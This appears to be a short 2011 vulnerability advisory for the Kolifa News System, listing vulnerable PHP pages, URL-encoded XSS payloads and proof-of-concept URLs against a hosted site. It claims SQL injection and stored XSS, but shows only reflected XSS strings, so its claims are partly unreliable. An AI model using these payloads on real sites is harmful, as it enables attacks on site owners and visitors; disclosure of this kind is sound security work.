# Exploit Title: Kolifa News System SQL Injection - Stored XSS
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr


ISSUE

SQL Injection and XSS can be done using the command input

Vulnerable Page:
arama.php
iletisim.php
habergoster.php


Example:
habergoster.php?haber_id=<XSS Code>
arama.php?haber_baslik=&show=<SQL Injection Code>


Exploit:
habergoster.php?haber_id=" onmouseover%3dprompt(906932) bad%3d"
iletisim.php/"onmouseover=prompt(942217)>
arama.php?haber_baslik=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28950890%29%3c%2fScRiPt%3e&show=2


POC:
http://haberpro.awardspace.com/haber_pro/habergoster.php?haber_id="  
onmouseover%3dprompt(906932) bad%3d"
http://haberpro.awardspace.com/haber_pro/iletisim.php/"onmouseover=prompt(942217)>
http://haberpro.awardspace.com/haber_pro/arama.php?haber_baslik=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28950890%29%3c%2fScRiPt%3e&show=2



Thanks,

Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr